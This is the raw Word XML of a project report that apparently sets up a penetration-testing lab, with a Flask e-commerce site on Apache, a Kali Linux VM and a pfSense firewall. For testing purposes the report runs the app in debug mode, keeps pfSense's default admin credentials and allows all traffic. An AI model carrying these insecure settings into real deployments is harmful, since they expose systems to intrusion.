            <wp:extent cx="4953000" cy="2413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241300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BEBBE2" w14:textId="6775D684" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>A new configuration file to respon</w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the wsgi mod is created inside the flaskecommerce folder, the folder </w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r>
        <w:t>then to be moved on the Apache document root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3A891F" w14:textId="4DF1F1BF" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="199FE01E" wp14:editId="4824FC5A">
            <wp:extent cx="4857750" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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50" cy="1231900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB30B1" w14:textId="7BF404AB" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">As the website </w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">still in early </w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t xml:space="preserve">stages of </w:t>
      </w:r>
      <w:r>
        <w:t>deployment</w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the wsgi is configured with debug mode enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C77EC9D" w14:textId="0E996B6B" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The e-commerce must</w:t>
      </w:r>
      <w:r w:rsidR="00246E1B">
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be enabled on apache, and the service restarted or reloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBD15AF" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="6760" w:dyaOrig="710" w14:anchorId="2565A230">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:338pt;height:35.5pt" o:ole="">
            <v:imagedata r:id="rId22" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1710221367" r:id="rId23"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F59B76" w14:textId="53896DEB" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The Apache configuration of the e-commerce, where the WSGIScipt ha</w:t>
      </w:r>
      <w:r w:rsidR="00A44559">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to refer</w:t>
      </w:r>
      <w:r w:rsidR="00A44559">
        <w:t xml:space="preserve"> back</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the app.wsgi previously configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6059E33E" w14:textId="489C977E" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470BC342" wp14:editId="5D34AB4D">
            <wp:extent cx="4502150" cy="1879600"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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2150" cy="1879600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="736FB882" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The flask e-commerce will now be running on Apache server on port 80(HTTP protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20063E27" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="17DD98F2" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE96AD3" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603D7937" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5167B174" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2EBE06" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779C2781" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE8B14E" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235E679A" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B005AAC" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49675336" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66907F09" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01867BE6" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3D337A" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A777ED0" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8B1970" w14:textId="12EC9E09" w:rsidR="00306832" w:rsidRPr="00D25AB7" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25AB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BAB2A" w14:textId="48D42963" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">The Kali Linux machine </w:t>
      </w:r>
      <w:r w:rsidR="00A44559">
        <w:t xml:space="preserve">used is the </w:t>
      </w:r>
      <w:r>
        <w:t>vmware amd 64 version, downloaded from kali.download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C23D0E" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00DF7185" w:rsidP="00306832">
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00306832">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-vmware-amd64.7z</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EAD10E8" w14:textId="0C40BC6D" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">the kali vm initial deployed has only default tools to maintain </w:t>
      </w:r>
      <w:r w:rsidR="00A44559">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>small as possible</w:t>
      </w:r>
      <w:r w:rsidR="00A44559">
        <w:t xml:space="preserve"> deployment file size. Any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> additional tool</w:t>
      </w:r>
      <w:r w:rsidR="00A44559">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will be installed as needed for the penetration testing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E97C9" w14:textId="32E48094" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="294EA12E" wp14:editId="2835CC1F">
            <wp:extent cx="2794000" cy="4019550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>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4000" cy="4019550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F78F3" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832"/>
    <w:p w14:paraId="7F1E403B" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159107DC" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDF500F" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3ED91F" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E067642" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D27A0D" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606A3931" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17EC4B5D" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5CF92D" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B07DC20" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8BE92B" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="088C0BC2" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC3B567" w14:textId="77777777" w:rsidR="00A44559" w:rsidRDefault="00A44559" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC1A51B" w14:textId="7FABC579" w:rsidR="00306832" w:rsidRPr="00A44559" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44559">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pfsense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E7C14B" w14:textId="1E469560" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="488A3242" wp14:editId="48090D0D">
            <wp:extent cx="2794000" cy="3517900"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="49" name="Picture 4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 application&#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4000" cy="3517900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF4055" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The Pfsense Virtual machine has been deployed as a fresh installation using the 2.5.2 image downloadable from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787FA126" w14:textId="76056B1D" w:rsidR="00306832" w:rsidRDefault="00DF7185" w:rsidP="00306832">
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00306832">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.pfsense.org/download/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00306832">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535627E3" w14:textId="3B85B205" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The pfsense VM is the main firewall</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve"> in this deployment. It serves as the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> router</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> redirecting</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve"> allowed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> traffic </w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve">types </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between the </w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve">networked </w:t>
      </w:r>
      <w:r>
        <w:t>machines</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s the scope of the project is to test the e-commerce web server and not the network infrastructure, </w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve">in this instance, </w:t>
      </w:r>
      <w:r>
        <w:t>the firewall rules are not designed to prevent/block traffic to specific ports or network areas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B451DB0" w14:textId="33D302D3" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The pfsense web interface will still initially accessible from the LAN network using the default credential</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590A3D6" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Username: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9F360" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Password: pfsense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A9146" w14:textId="6EAE30F5" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The pfsense VM will have three networks adapter</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, WAN, LAN and DMZ</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he IP Addresses follows the Network topology layout of the Initial Report</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B991F91" w14:textId="35F83D30" w:rsidR="004564E8" w:rsidRDefault="004564E8" w:rsidP="00306832">
      <w:r w:rsidRPr="004564E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B8DF98B" wp14:editId="748FACF7">
            <wp:extent cx="6051550" cy="3079750"/>
            <wp:effectExtent l="0" t="0" r="635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1550" cy="3079750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66141DBE" w14:textId="73795662" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B6F1EE" wp14:editId="062FD133">
            <wp:extent cx="4559300" cy="170180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9300" cy="1701800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC5F0D8" w14:textId="6924C76B" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">The VMs network configuration and deployment </w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">run initially </w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> V</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ware</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t>ith a transition to VSOC for the final deployment should access to the infrastructure be made available</w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004564E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B55ABF" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The Virtual network configured as follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086727C8" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="8280" w:dyaOrig="1810" w14:anchorId="1D6C1D24">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:414pt;height:90.5pt" o:ole="">
            <v:imagedata r:id="rId31" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1710221368" r:id="rId32"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DE7B0" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Network Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E4872" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="9020" w:dyaOrig="6930" w14:anchorId="57A6B449">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:451pt;height:346.5pt" o:ole="">
            <v:imagedata r:id="rId33" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1029" DrawAspect="Content" ObjectID="_1710221369" r:id="rId34"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36DF29" w14:textId="77777777" w:rsidR="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832"/>
    <w:p w14:paraId="46703282" w14:textId="77777777" w:rsidR="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832"/>
    <w:p w14:paraId="30C71F5F" w14:textId="77777777" w:rsidR="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832"/>
    <w:p w14:paraId="64A40F14" w14:textId="77777777" w:rsidR="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832"/>
    <w:p w14:paraId="5B0DFA7B" w14:textId="620B4006" w:rsidR="00306832" w:rsidRDefault="009E0EFC" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A f</w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t xml:space="preserve">ew rules to allow traffic are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t xml:space="preserve">created to allow </w:t>
      </w:r>
      <w:r>
        <w:t>networked machines</w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:t xml:space="preserve"> to communicate with each other</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424F1BF2" w14:textId="095D0184" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="315F35ED" wp14:editId="0326FA4D">
            <wp:extent cx="5734050" cy="1841500"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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1841500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEFF5E4" w14:textId="02861AD7" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CA4A409" wp14:editId="10D2D019">
            <wp:extent cx="5734050" cy="1517650"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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1517650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B92A01" w14:textId="6CCB9BBE" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>As this is the initial configuration and for testing purpose traffic is allowed in all direction, however new rules are expected to be implemented in later stage of the project</w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:t xml:space="preserve"> if required for any system hardening.</w:t>
      </w:r>
